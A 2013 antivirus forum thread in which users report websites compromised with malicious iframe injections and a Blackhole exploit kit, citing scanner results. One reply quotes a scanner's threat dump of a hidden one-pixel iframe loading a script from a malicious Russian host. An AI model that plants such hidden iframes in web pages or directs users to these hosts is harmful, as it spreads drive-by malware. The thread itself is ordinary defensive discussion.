Author Topic: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan... (Read 2118 times)

polonus · « **on:** May 16, 2013, 09:26:04 PM »

Folks, we really cannot do without avast! Web Shield for our protection. Checked this...Up(nil): unknown_html ARIN US abuse at softlayer dot com 50.22.194.94 to 50.22.194.94 berkonoutdoors dot com htxp://berkonoutdoors.com/catalog/
So wanted to look this domain up with evuln malware scanner and avast! Web Shield flagged JS:Decode-XA[Trj]
Detected malicious iframe injection -> http://urlquery.net/report.php?id=2496495
so even getting enough of the malcode in a scan will block access to that scan.
We have a hihj level of protection, my friends, we sure have...
Also detected here: http://scanurl.net/?u=http%3A%2F%2Fberkonoutdoors.com%2Fcatalog%2Faccount.php&uesb=Check+This+URL#results

polonus

Pondus · « **Reply #1 on:** May 16, 2013, 10:34:24 PM »

Blackhole exploit
https://www.virustotal.com/nb/file/8d71de0fb803f921a60a74f080e1c44e224d6ea87c6c02bafb724e2be7e61b16/analysis/1368736403/

polonus · « **Reply #2 on:** May 16, 2013, 10:48:39 PM »

Hi Pondus,

Well done, my friend, and thanks, you found up the accompanying file analysis, conclusion - we are being protected,

polonus

polonus · « **Reply #3 on:** May 17, 2013, 04:51:30 PM »

Another example here: https://www.virustotal.com/en/url/9eb8238066cc10b7b820161ab9490946756498c1b81a983242bfb4a1f04db015/analysis/1368801212/
Trying to see the evuln dot com scan results resulted in the avast! Webshield alerting HTML:Iframe-AKU[Trj] and blocking the | (gzip) file there....
Potentially suspicious code in: /plugins/system/rokbox/rokbox-mt1.2.js
Severity: Potentially Suspicious
Reason: Detected potentially suspicious content.
Details: Detected potentially suspicious initialization of function pointer to JavaScript method write <code> __tmpvar2040143295 = write; <code/>
File size[byte]: 21665
File type: ASCII
MD5: FF5022D82F8C393211349AE8951ACB8E
Scan duration[sec]: 0.086000
given at Quttera's.....
Site has vulnerable Joomla code: oomla Version 1.5.18 to 1.5.26 for: htxp://thejourneypc.com/language/en-GB/en-GB.ini via plug-in...
Site blacklisted by Google's Safebrowsing

polonus

polonus · « **Reply #4 on:** May 17, 2013, 05:09:22 PM »

Same here: http://sitecheck.sucuri.net/results/slownik-angielsko-polski.pl/ WP plug-in vulnerabilities....
https://www.virustotal.com/en/url/f9cc0d2d903232134eb5533c2c6b0cfba98c4d3ffbebcb43116774b73b46114a/analysis/1368802643/
we would think but avast does not flag going to site...
index.html
Severity: Suspicious
Reason: Detected hidden reference to external web resource.
Details: Detected hidden iframe tag to 'temp.vulkancomplect.ru' a bad webhost with on IP 283 appearance(s) in spam e-mail or spam post urls
Threat dump: [[<iframe src="htxp://temp.vulkancomplect.ru/srqoxie.php" width=1 height=1 style="visibility: hidden">]]
File size[byte]: 1744
File type: ASCII
MD5: 1D3446BD473753C8A1842DDC1F1C189B
Scan duration[sec]: 0.002000
i.m.h.o. should be blocked,

polonus

Author Topic: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan... (Read 2118 times)

polonus

Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...

Pondus

Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...

polonus

Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...

polonus

Re: Web Shield flags site on a High Risk Hosting Provider even via 3rd party scan...

polonus

Re: Web Shield does not flag this redirect to a High Risk Hosting Provider..